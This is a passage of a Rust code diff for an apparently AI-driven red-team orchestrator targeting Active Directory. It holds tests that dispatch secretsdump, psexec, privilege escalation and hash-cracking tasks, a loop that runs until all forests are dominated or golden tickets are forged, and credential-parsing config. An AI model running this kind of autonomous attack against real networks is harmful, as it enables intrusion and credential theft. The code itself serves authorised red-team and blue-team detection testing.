s.hashes.push(make_hash( + "admin", + "contoso.local", + "aes256", + "aes_hash", + None, + )); + } + + let call = ToolCall { + id: "int-4".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "admin", "domain": "contoso.local", "hash_type": "aes256"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + assert!(msg.contains("aes_hash")); + assert!(!msg.contains("ntlm_hash")); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_all_dispatch_tools_fail_without_dispatcher() { + let handler = make_handler(); + let dispatch_tools = [ + ("dispatch_recon", json!({"target_ip": "192.168.58.10"})), + ( + "dispatch_credential_access", + json!({"technique": "secretsdump", "target_ip": "x", "domain": "x", "username": "x", "password": "x"}), + ), + ( + "dispatch_lateral_movement", + json!({"target_ip": "x", "technique": "psexec", "username": "x", "password": "x", "domain": "x"}), + ), + ("dispatch_privesc_exploit", json!({"vuln_id": "v-1"})), + ( + "dispatch_coercion", + json!({"target_ip": "x", "listener_ip": "x"}), + ), + ( + "dispatch_crack", + json!({"hash_value": "aad3b:beef", "hash_type": "ntlm"}), + ), + ]; + + for (tool, args) in &dispatch_tools { + let call = ToolCall { + id: format!("disp-{tool}"), + name: tool.to_string(), + arguments: args.clone(), + }; + let result = handler.handle_callback(&call).await; + assert!(result.is_some(), "Should recognize: {tool}"); + assert!( + result.unwrap().is_err(), + "Should error without dispatcher: {tool}" + ); + } +} + +#[tokio::test] +async fn test_all_callback_tools_recognized() { + let handler = make_handler(); + let tools = [ + "get_credential_summary", + "get_hash_summary", + "get_all_credentials", + "get_all_hashes", + "get_hash_value", + "get_pending_tasks", + "get_operation_summary", + "dispatch_recon", + "dispatch_credential_access", + "dispatch_lateral_movement", + "dispatch_privesc_exploit", + "dispatch_coercion", + "dispatch_crack", + ]; + + for tool in &tools { + let call = ToolCall { + id: format!("route-{tool}"), + name: tool.to_string(), + arguments: json!({"username": "x", "domain": "x", "target_ip": "x", + "technique": "x", "password": "x", "hash_value": "x", + "hash_type": "x", "vuln_id": "x", "listener_ip": "x"}), + }; + assert!( + handler.handle_callback(&call).await.is_some(), + "Handler should recognize: {tool}" + ); + } + + // Unknown tool returns None + let call = ToolCall { + id: "route-unknown".into(), + name: "nmap_scan".into(), + arguments: json!({}), + }; + assert!(handler.handle_callback(&call).await.is_none()); +} + +#[tokio::test] +async fn test_all_hashes_pagination_large() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + for i in 0..50 { + s.hashes.push(make_hash( + &format!("user{i}"), + "contoso.local", + "NTLM", + &format!("hash_{i}"), + None, + )); + } + } + + let call = ToolCall { + id: "int-pg".into(), + name: "get_all_hashes".into(), + arguments: json!({"limit": 10, "offset": 40}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["total"], 50); + assert_eq!(p["hashes"].as_array().unwrap().len(), 10); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs new file mode 100644 index 00000000..8a54c36e --- /dev/null +++ b/ares-cli/src/orchestrator/completion.rs @@ -0,0 +1,492 @@ +//! Completion and golden-ticket wait loops. +//! +//! These functions block (async) until the operation reaches a terminal state: +//! all forests dominated, golden tickets forged, max runtime exceeded, or +//! explicit shutdown. +//! +//! Two config flags control early-exit behaviour (mutually exclusive): +//! - `stop_on_domain_admin`: stop as soon as DA is achieved on any domain, +//! without waiting for all trusted forests to be dominated. +//! - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with +//! ExtraSid for child→parent escalation, then stop once forged. + +use std::collections::HashSet; +use std::sync::Arc; +use std::time::Duration; + +use chrono::Utc; +use redis::AsyncCommands; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::SharedState; + +/// Pure computation: given state fields, return undominated forest root domains. +/// +/// Used by both the async `undominated_forests()` and `SharedState::snapshot()`. +pub fn compute_undominated_forests( + target_domain: Option<&str>, + first_domain: Option<&str>, + trusted_domains: &std::collections::HashMap, + dominated_domains: &HashSet, +) -> Vec { + let mut required_forests: HashSet = HashSet::new(); + + if let Some(td) = target_domain { + if !td.is_empty() { + required_forests.insert(forest_root_of(td)); + } + } + if let Some(fd) = first_domain { + required_forests.insert(forest_root_of(fd)); + } + + for trust in trusted_domains.values() { + if trust.is_cross_forest() { + required_forests.insert(forest_root_of(&trust.domain)); + } + } + + if required_forests.is_empty() { + return Vec::new(); + } + + let dominated_roots: HashSet = dominated_domains + .iter() + .map(|d| forest_root_of(d)) + .collect(); + + required_forests + .difference(&dominated_roots) + .cloned() + .collect() +} + +/// Check if all trusted forests have been dominated. +/// +/// Returns a list of forest root domains that still need krbtgt hashes. +/// An empty list means all forests are dominated. +/// +/// This mirrors Python's `all_forests_dominated()` which checks that +/// krbtgt hashes are obtained from every trusted forest, not just the +/// initial target domain. +pub async fn undominated_forests(state: &SharedState) -> Vec { + let inner = state.read().await; + compute_undominated_forests( + inner.target.as_ref().map(|t| t.domain.as_str()), + inner.domains.first().map(|d| d.as_str()), + &inner.trusted_domains, + &inner.dominated_domains, + ) +} + +/// Extract forest root from a domain FQDN. +/// +/// For `north.contoso.local` → `contoso.local` +/// For `contoso.local` → `contoso.local` +fn forest_root_of(domain: &str) -> String { + let lower = domain.to_lowercase(); + let parts: Vec<&str> = lower.split('.').collect(); + if parts.len() <= 2 { + lower + } else { + // Walk up to find the 2-part root (assumes .local/.com TLD) + parts[parts.len() - 2..].join(".") + } +} + +/// Main operation completion loop. +/// +/// Polls every `interval` checking for: +/// - All forests dominated (krbtgt from every trusted forest) +/// - `completed` flag set (external completion signal) +/// - Max runtime exceeded +/// +/// Behaviour is influenced by two mutually exclusive config flags: +/// - `stop_on_domain_admin`: stop as soon as DA is achieved on *any* domain, +/// without waiting for forests or golden tickets. +/// - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with +/// ExtraSid, then stop. If the ticket isn't forged within 60 s of DA, stop +/// anyway. +/// +/// When neither flag is set (default), the operation continues until all +/// trusted forests are dominated or max runtime is exceeded. +pub async fn wait_for_completion( + state: &SharedState, + dispatcher: &Arc, + mut shutdown_rx: watch::Receiver, + max_runtime: Duration, + interval: Duration, +) { + let start = tokio::time::Instant::now(); + + // Read stop-condition flags from config (default: both false) + let (stop_on_da, stop_on_gt) = dispatcher + .ares_config + .as_ref() + .map(|c| { + ( + c.operation.stop_on_domain_admin, + c.operation.stop_on_golden_ticket, + ) + }) + .unwrap_or((false, false)); + + info!( + max_runtime_secs = max_runtime.as_secs(), + stop_on_domain_admin = stop_on_da, + stop_on_golden_ticket = stop_on_gt, + "Completion monitor started" + ); + + loop { + // Check shutdown + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown"); + return; + } + + let elapsed = start.elapsed(); + let (has_da, has_gt, completed) = { + let inner = state.read().await; + ( + inner.has_domain_admin, + inner.has_golden_ticket, + inner.completed, + ) + }; + + // Check completion conditions. + // + // Priority order matches Python's _wait_for_completion(): + // 1. External completed flag (e.g. CLI stop signal) + // 2. Max runtime exceeded + // 3. stop_on_domain_admin: stop immediately on DA + // 4. stop_on_golden_ticket: stop when DA + golden ticket achieved + // 5. Default: stop when all trusted forests are dominated + let reason = if completed { + Some("operation marked completed") + } else if elapsed >= max_runtime { + Some("max runtime exceeded") + } else if has_da { + if stop_on_da { + // Config says stop immediately on DA — skip forest check + Some("domain admin achieved (stop_on_domain_admin)") + } else if stop_on_gt { + // stop_on_golden_ticket: keep running until GT is forged. + // Do NOT fall through to the "all forests dominated" default + // path — that would exit without the golden ticket. + if has_gt { + Some("golden ticket forged (stop_on_golden_ticket)") + } else { + None // Continue — waiting for golden ticket + } + } else { + // Default: continue until all forests are dominated + let remaining = undominated_forests(state).await; + if remaining.is_empty() { + Some("all forests dominated") + } else { + debug!( + undominated = ?remaining, + "DA achieved but forests remain undominated" + ); + None // Continue — other forests still need krbtgt + } + } + } else { + None + }; + + if let Some(reason) = reason { + info!( + reason = reason, + elapsed_secs = elapsed.as_secs(), + has_domain_admin = has_da, + has_golden_ticket = has_gt, + "Completion condition met" + ); + + // When blue team is enabled, auto-submit an investigation from the + // operation state if none have been submitted yet, then wait for all + // investigations to drain before signalling stop. + // Cap at 20 minutes to avoid hanging forever if an investigation is stuck. + if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { + info!("Blue team enabled — waiting for investigations to finish before shutdown"); + let mut conn = dispatcher.queue.connection(); + + // Check if any blue investigations already exist for this operation. + // If not, auto-submit one so blue always gets at least one run. + let op_inv_key = format!( + "ares:blue:op:{}:investigations", + dispatcher.config.operation_id + ); + let existing: i64 = redis::cmd("SCARD") + .arg(&op_inv_key) + .query_async(&mut conn) + .await + .unwrap_or(0); + if existing == 0 { + info!("No blue investigations found — auto-submitting from operation state"); + if let Err(e) = + auto_submit_blue_investigation(state, dispatcher, &mut conn).await + { + warn!(err = %e, "Failed to auto-submit blue investigation"); + } + } + let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(1200); + loop { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown while waiting for blue"); + break; + } + + if tokio::time::Instant::now() >= blue_deadline { + warn!("Blue team wait deadline reached (20m) — proceeding with shutdown"); + break; + } + + let active: i64 = redis::cmd("SCARD") + .arg(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) + .query_async(&mut conn) + .await + .unwrap_or(0); + let queued: i64 = redis::cmd("LLEN") + .arg("ares:blue:investigations") + .query_async(&mut conn) + .await + .unwrap_or(0); + + if active == 0 && queued == 0 { + info!("All blue investigations finished"); + break; + } + + info!( + active_investigations = active, + queued_investigations = queued, + "Waiting for blue team to finish..." + ); + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(10)) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + break; + } + } + } + } + } + + // Signal the main loop to stop via Redis so it breaks out of its + // select! within the next 5-second poll cycle. + { + let mut conn = dispatcher.queue.connection(); + if let Err(e) = ares_core::state::request_stop_operation( + &mut conn, + &dispatcher.config.operation_id, + ) + .await + { + warn!(err = %e, "Failed to set Redis stop signal from completion monitor"); + } + } + + // Extend the lock one final time before returning + if let Err(e) = dispatcher.extend_lock().await { + warn!(err = %e, "Failed to extend lock during completion"); + } + + return; + } + + // Sleep until next check or shutdown + tokio::select! { + _ = tokio::time::sleep(interval) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown"); + return; + } + } + } + } +} + +/// Auto-submit a blue team investigation from the current red team operation state. +/// +/// Mirrors the logic in `ares-cli/src/blue/submit.rs::blue_from_operation()` but +/// runs inline within the orchestrator process so blue always gets at least one +/// investigation even when the red operation completes before blue's first poll. +async fn auto_submit_blue_investigation( + state: &SharedState, + dispatcher: &Arc, + conn: &mut redis::aio::ConnectionManager, +) -> Result<(), anyhow::Error> { + let op_id = &dispatcher.config.operation_id; + let now = Utc::now(); + let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); + + // Read state snapshot for building the synthetic alert + let (target_domain, target_env, cred_count, host_count, vuln_count, has_da, target_ips) = { + let inner = state.read().await; + let domain = inner + .target + .as_ref() + .map(|t| t.domain.clone()) + .unwrap_or_default(); + let env = inner + .target + .as_ref() + .map(|t| t.environment.clone()) + .unwrap_or_default(); + let ips: Vec = inner.hosts.iter().map(|h| h.ip.clone()).collect(); + ( + domain, + env, + inner.credentials.len(), + inner.hosts.len(), + inner.discovered_vulnerabilities.len(), + inner.has_domain_admin, + ips, + ) + }; + + // Collect attack techniques from Redis + let techniques_key = format!("ares:op:{op_id}:techniques"); + let techniques: Vec = redis::cmd("SMEMBERS") + .arg(&techniques_key) + .query_async(conn) + .await + .unwrap_or_default(); + + let operation_context = serde_json::json!({ + "operation_id": op_id, + "attack_window_start": now.to_rfc3339(), + "attack_window_end": now.to_rfc3339(), + "techniques_used": &techniques[..std::cmp::min(techniques.len(), 20)], + "deployment": target_env, + }); + + let alert = serde_json::json!({ + "labels": { + "alertname": format!("RedTeamOperation_{}", op_id), + "severity": "critical", + "source": "ares-red-team", + "deployment": target_env, + }, + "annotations": { + "summary": format!( + "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", + ), + "description": format!( + "Investigate blue team detection coverage for red team operation {op_id}. \ + Domain: {target_domain}. Domain admin: {has_da}.", + ), + }, + "operation_context": operation_context, + "startsAt": now.to_rfc3339(), + "endsAt": now.to_rfc3339(), + "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], + }); + + // Resolve model from env (same precedence as CLI) + let model = std::env::var("ARES_BLUE_LLM_MODEL") + .ok() + .filter(|s| !s.is_empty()) + .or_else(|| std::env::var("ARES_MODEL_OVERRIDE").ok()) + .or_else(|| std::env::var("ARES_ORCHESTRATOR_MODEL").ok()) + .or_else(|| std::env::var("ARES_MODEL").ok()); + + let grafana_url = std::env::var("GRAFANA_URL").ok(); + let grafana_api_key = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); + + let max_steps: u32 = std::env::var("ARES_BLUE_MAX_STEPS") + .ok() + .and_then(|s| s.parse().ok()) + .unwrap_or(75); + + let request = serde_json::json!({ + "investigation_id": inv_id, + "alert": alert, + "correlation_context": null, + "model": model, + "max_steps": max_steps, + "multi_agent": true, + "auto_route": false, + "report_dir": null, + "grafana_url": grafana_url, + "grafana_api_key": grafana_api_key, + "submitted_at": now.to_rfc3339(), + }); + + // Store env vars for the blue runner (Grafana token, API keys) + let env_vars: std::collections::HashMap = [ + "ANTHROPIC_API_KEY", + "OPENAI_API_KEY", + "GRAFANA_SERVICE_ACCOUNT_TOKEN", + "GRAFANA_URL", + ] + .iter() + .filter_map(|&key| std::env::var(key).ok().map(|v| (key.to_string(), v))) + .collect(); + + if !env_vars.is_empty() { + let env_vars_key = format!("ares:blue:inv:{inv_id}:env_vars"); + let env_json = serde_json::to_string(&env_vars)?; + let _: () = conn.set(&env_vars_key, &env_json).await?; + let _: () = conn.expire(&env_vars_key, 3600).await?; + } + + // Pre-register as active BEFORE pushing to queue to avoid TOCTOU race: + // without this, the completion wait loop can observe both queued==0 and + // active==0 in the window between the blue orchestrator's BRPOP (drains + // the queue) and its register_investigation (SADDs to active set). + let _: () = conn + .sadd(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, &inv_id) + .await?; + let _: () = conn + .expire(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, 86400) + .await?; + + // Push investigation request to queue + let request_json = serde_json::to_string(&request)?; + let _: () = conn + .rpush("ares:blue:investigations", &request_json) + .await?; + + // Track investigation against operation + let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); + let _: () = conn.sadd(&op_inv_key, &inv_id).await?; + let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; + + info!( + investigation_id = inv_id, + operation_id = op_id, + "Auto-submitted blue investigation from operation state" + ); + + Ok(()) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_forest_root_of_simple() { + assert_eq!(forest_root_of("contoso.local"), "contoso.local"); + } + + #[test] + fn test_forest_root_of_child() { + assert_eq!(forest_root_of("north.contoso.local"), "contoso.local"); + } + + #[test] + fn test_forest_root_of_deep_child() { + assert_eq!(forest_root_of("sub.north.contoso.local"), "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs new file mode 100644 index 00000000..fcaefb39 --- /dev/null +++ b/ares-cli/src/orchestrator/config.rs @@ -0,0 +1,365 @@ +//! Configuration loaded from environment variables. +//! +//! Mirrors the Python `ares.core.config` module. Every knob exposed to the +//! Python orchestrator is also configurable here so the Rust binary is a +//! drop-in replacement. + +use std::env; +use std::time::Duration; + +/// All tunables for the orchestrator, loaded once at startup. +#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct OrchestratorConfig { + /// Redis connection URL (supports `redis://` and `redis+sentinel://`). + pub redis_url: String, + + /// Operation ID this orchestrator instance manages. + pub operation_id: String, + + /// Maximum number of concurrent LLM-consuming tasks across all roles. + pub max_concurrent_tasks: usize, + + /// Interval between heartbeat sweeps. + pub heartbeat_interval: Duration, + + /// How long before an agent with no heartbeat is considered dead. + pub heartbeat_timeout: Duration, + + /// How often the result consumer polls Redis for completed tasks. + pub result_poll_interval: Duration, + + /// TTL for the operation lock key (`ares:lock:{op_id}`). + pub lock_ttl: Duration, + + /// How often the deferred-queue processor wakes up. + pub deferred_poll_interval: Duration, + + /// Maximum number of tasks a single role can have in-flight. + pub max_tasks_per_role: usize, + + /// Global rate-limit: minimum delay between consecutive task dispatches. + pub dispatch_delay: Duration, + + /// How long before an in-progress task with no activity is considered stale. + pub stale_task_timeout: Duration, + + /// Maximum age for deferred tasks before eviction (seconds). + pub deferred_task_max_age: Duration, + + /// Maximum number of deferred tasks per task type. + pub max_deferred_per_type: usize, + + /// Maximum total deferred tasks across all types. + pub max_deferred_total: usize, + + /// Target domain for the operation (e.g. "contoso.local"). + pub target_domain: String, + + /// Target IPs for the operation (comma-separated in env, parsed to vec). + pub target_ips: Vec, + + /// Initial credential to seed at startup (optional). + /// Format: `user:pass@domain` or from JSON payload. + pub initial_credential: Option, +} + +/// A credential provided at operation launch time. +#[derive(Debug, Clone)] +pub struct InitialCredential { + pub username: String, + pub password: String, + pub domain: String, +} + +impl OrchestratorConfig { + /// Load configuration from environment variables with sensible defaults. + pub fn from_env() -> anyhow::Result { + let redis_url = + env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); + + let raw_op = env::var("ARES_OPERATION_ID") + .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?; + + // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON + // payload (the queue dispatcher passes the entire operation request JSON). + let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') { + let v: serde_json::Value = serde_json::from_str(&raw_op) + .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?; + let op_id = v["operation_id"] + .as_str() + .ok_or_else(|| anyhow::anyhow!("Missing operation_id in JSON payload"))? + .to_string(); + let domain = v["target_domain"].as_str().unwrap_or("").to_string(); + let ips: Vec = v["target_ips"] + .as_array() + .map(|arr| { + arr.iter() + .filter_map(|v| v.as_str().map(|s| s.to_string())) + .collect() + }) + .unwrap_or_default(); + // Extract initial credential from JSON payload. + // Python sends a nested object: {"initial_credential": {"username": ..., "password": ..., "domain": ...}} + // Also support flat fields for backwards compatibility: {"initial_username": ..., "initial_password": ...} + let cred = if let Some(ic) = v.get("initial_credential").and_then(|v| v.as_object()) { + match ( + ic.get("username").and_then(|v| v.as_str()), + ic.get("password").and_then(|v| v.as_str()), + ) { + (Some(user), Some(pass)) => Some(InitialCredential { + username: user.to_string(), + password: pass.to_string(), + domain: ic + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(&domain) + .to_string(), + }), + _ => None, + } + } else { + // Flat field fallback + match ( + v["initial_username"].as_str(), + v["initial_password"].as_str(), + ) { + (Some(user), Some(pass)) => Some(InitialCredential { + username: user.to_string(), + password: pass.to_string(), + domain: v["initial_domain"].as_str().unwrap_or(&domain).to_string(), + }), + _ => None, + } + }; + (op_id, domain, ips, cred) + } else { + // Plain operation ID — read target info from separate env vars + let domain = env::var("ARES_TARGET_DOMAIN").unwrap_or_default(); + let ips: Vec = env::var("ARES_TARGET_IPS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + (raw_op, domain, ips, None) + }; + + // Initial credential: JSON payload takes precedence, then env var. + // Format: user:pass@domain + let initial_credential = json_cred.or_else(|| { + env::var("ARES_INITIAL_CREDENTIAL") + .ok() + .and_then(|raw| parse_credential_spec(&raw, &target_domain)) + }); + + let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); + let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); + let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); + let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); + let lock_ttl_secs = parse_env("ARES_LOCK_TTL_SECS", 300); + let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10); + let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3); + let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200); + let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900); + let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300); + let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50); + let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200); + + Ok(Self { + redis_url, + operation_id, + max_concurrent_tasks, + heartbeat_interval: Duration::from_secs(heartbeat_interval_secs), + heartbeat_timeout: Duration::from_secs(heartbeat_timeout_secs), + result_poll_interval: Duration::from_millis(result_poll_interval_ms), + lock_ttl: Duration::from_secs(lock_ttl_secs), + deferred_poll_interval: Duration::from_secs(deferred_poll_interval_secs), + max_tasks_per_role, + dispatch_delay: Duration::from_millis(dispatch_delay_ms), + stale_task_timeout: Duration::from_secs(stale_task_timeout_secs), + deferred_task_max_age: Duration::from_secs(deferred_task_max_age_secs), + max_deferred_per_type, + max_deferred_total, + target_domain, + target_ips, + initial_credential, + }) + } + + /// Hard cap = 1.5x the soft concurrency limit. Tasks above this are deferred. + pub fn hard_cap(&self) -> usize { + (self.max_concurrent_tasks as f64 * 1.5) as usize + } +} + +/// Parse a credential spec in `user:pass@domain` format. +/// If no `@domain` is given, falls back to `default_domain`. +/// +/// The `@` that separates password from domain must look like a domain +/// (contains a dot). This avoids misinterpreting `@` characters within +/// passwords (e.g., `admin:P@ssw0rd` stays intact). +fn parse_credential_spec(spec: &str, default_domain: &str) -> Option { + let colon_pos = spec.find(':')?; + let username = &spec[..colon_pos]; + let rest = &spec[colon_pos + 1..]; // password[@domain] + + // Only treat text after the last '@' as a domain if it contains a dot, + // to avoid misinterpreting '@' in passwords (e.g. P@ssw0rd). + let (password, domain) = if let Some(at_pos) = rest.rfind('@') { + let candidate = &rest[at_pos + 1..]; + if candidate.contains('.') { + (&rest[..at_pos], candidate) + } else { + (rest, default_domain) + } + } else { + (rest, default_domain) + }; + + if username.is_empty() || password.is_empty() { + return None; + } + Some(InitialCredential { + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + }) +} + +/// Parse an environment variable into a numeric type, falling back to `default`. +fn parse_env(key: &str, default: T) -> T { + env::var(key) + .ok() + .and_then(|v| v.parse().ok()) + .unwrap_or(default) +} + +#[cfg(test)] +mod tests { + use super::*; + + /// Helper to create a config without env vars. + pub(crate) fn make_config(max_tasks: usize) -> OrchestratorConfig { + OrchestratorConfig { + redis_url: "redis://localhost".into(), + operation_id: "test-op".into(), + max_concurrent_tasks: max_tasks, + heartbeat_interval: Duration::from_secs(30), + heartbeat_timeout: Duration::from_secs(120), + result_poll_interval: Duration::from_millis(500), + lock_ttl: Duration::from_secs(300), + deferred_poll_interval: Duration::from_secs(10), + max_tasks_per_role: 3, + dispatch_delay: Duration::from_millis(0), + stale_task_timeout: Duration::from_secs(900), + deferred_task_max_age: Duration::from_secs(300), + max_deferred_per_type: 50, + max_deferred_total: 200, + target_domain: String::new(), + target_ips: Vec::new(), + initial_credential: None, + } + } + + #[test] + fn hard_cap_is_1_5x() { + assert_eq!(make_config(8).hard_cap(), 12); + assert_eq!(make_config(10).hard_cap(), 15); + assert_eq!(make_config(1).hard_cap(), 1); + } + + #[test] + fn from_env_plain_and_json_and_missing() { + // Single test to avoid env var race conditions between parallel tests. + std::env::remove_var("ARES_INITIAL_CREDENTIAL"); + + // Missing → error + std::env::remove_var("ARES_OPERATION_ID"); + assert!(OrchestratorConfig::from_env().is_err()); + + // Plain string → operation_id, empty targets + std::env::set_var("ARES_OPERATION_ID", "test-op-1"); + let c = OrchestratorConfig::from_env().unwrap(); + assert_eq!(c.operation_id, "test-op-1"); + assert_eq!(c.max_concurrent_tasks, 8); + assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); + assert!(c.target_ips.is_empty()); + assert!(c.initial_credential.is_none()); + + // JSON payload → parsed operation_id, target_domain, target_ips + let payload = r#"{"operation_id":"op-json-test","target_domain":"contoso.local","target_ips":["192.168.58.1","192.168.58.2"],"model":"gpt-4"}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + assert_eq!(c.operation_id, "op-json-test"); + assert_eq!(c.target_domain, "contoso.local"); + assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); + + // JSON payload with nested initial_credential (Python format) + let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "Pass123"); + assert_eq!(cred.domain, "contoso.local"); + + // JSON payload with flat initial credential (backwards compat) + let payload = r#"{"operation_id":"op-cred2","target_domain":"contoso.local","target_ips":[],"initial_username":"admin2","initial_password":"Pass456"}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "admin2"); + assert_eq!(cred.password, "Pass456"); + assert_eq!(cred.domain, "contoso.local"); + + // Env var credential (ARES_INITIAL_CREDENTIAL) + std::env::set_var("ARES_OPERATION_ID", "test-op-2"); + std::env::set_var("ARES_INITIAL_CREDENTIAL", "user1:secret@fabrikam.local"); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "user1"); + assert_eq!(cred.password, "secret"); + assert_eq!(cred.domain, "fabrikam.local"); + + std::env::remove_var("ARES_OPERATION_ID"); + std::env::remove_var("ARES_INITIAL_CREDENTIAL"); + } + + #[test] + fn parse_credential_spec_full() { + let cred = parse_credential_spec("admin:P@ssw0rd@contoso.local", "").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "P@ssw0rd"); + assert_eq!(cred.domain, "contoso.local"); + } + + #[test] + fn parse_credential_spec_no_domain() { + let cred = parse_credential_spec("admin:P@ssw0rd", "fallback.local").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "P@ssw0rd"); + assert_eq!(cred.domain, "fallback.local"); + } + + #[test] + fn parse_credential_spec_at_in_password() { + // rfind('@') splits at the last @, so user:p@ss@domain works + let cred = parse_credential_spec("admin:p@ss@contoso.local", "").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "p@ss"); + assert_eq!(cred.domain, "contoso.local"); + } + + #[test] + fn parse_credential_spec_invalid() { + // No colon + assert!(parse_credential_spec("admin", "").is_none()); + // Empty username + assert!(parse_credential_spec(":pass@contoso.local", "").is_none()); + // Empty password + assert!(parse_credential_spec("admin:@contoso.local", "").is_none()); + // Empty password without domain + assert!(parse_credential_spec("admin:", "").is_none()); + } +} diff --git a/ares-cli/src/orchestrator/cost_summary.rs b/ares-cli/src/orchestrator/cost_summary.rs new file mode 100644 index 00000000..ff4b4a8f --- /dev/null +++ b/ares-cli/src/orchestrator/cost_summary.rs @@ -0,0 +1,87 @@ +//! Periodic token usage and cost summary. +//! +//! Spawns a background task that logs aggregate token usage and estimated cost +//! every 120 seconds, matching Python's `_periodic_token_usage_summary()`. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tokio::task::JoinHandle; +use tracing::{debug, info}; + +use ares_core::token_usage::{estimate_usage_cost, get_token_usage}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::task_queue::TaskQueue; + +/// How often to log the cost summary. +const SUMMARY_INTERVAL: Duration = Duration::from_secs(120); + +/// Spawn the periodic cost summary background task. +pub fn spawn_cost_summary( + queue: TaskQueue, + config: Arc, + shutdown_rx: watch::Receiver, +) -> JoinHandle<()> { + tokio::spawn(cost_summary_loop(queue, config, shutdown_rx)) +} + +async fn cost_summary_loop( + queue: TaskQueue, + config: Arc, + mut shutdown_rx: watch::Receiver, +) { + let mut interval = tokio::time::interval(SUMMARY_INTERVAL); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Skip the first immediate tick + interval.tick().await; + + loop { + tokio::select! { + _ = interval.tick() => {} + _ = shutdown_rx.changed() => { + debug!("Cost summary: shutdown"); + return; + } + } + + if *shutdown_rx.borrow() { + return; + } + + let mut conn = queue.connection(); + match get_token_usage(&mut conn, &config.operation_id).await { + Ok(Some(usage)) => { + let in_tok = usage.input_tokens; + let out_tok = usage.output_tokens; + if in_tok == 0 && out_tok == 0 { + continue; + } + let total = in_tok + out_tok; + + let (total_cost, breakdown, _unpriced) = estimate_usage_cost(&usage); + + let cost_str = match total_cost { + Some(cost) => { + let suffix = if breakdown.len() > 1 { " blended" } else { "" }; + format!(" | ${cost:.4}{suffix}") + } + None if !usage.models.is_empty() => { + let n = usage.models.len(); + let label = if n > 1 { "models" } else { "model" }; + format!(" | cost unavailable for {n} {label}") + } + _ => String::new(), + }; + + info!("💰 [token-usage] {total} tokens (in: {in_tok} out: 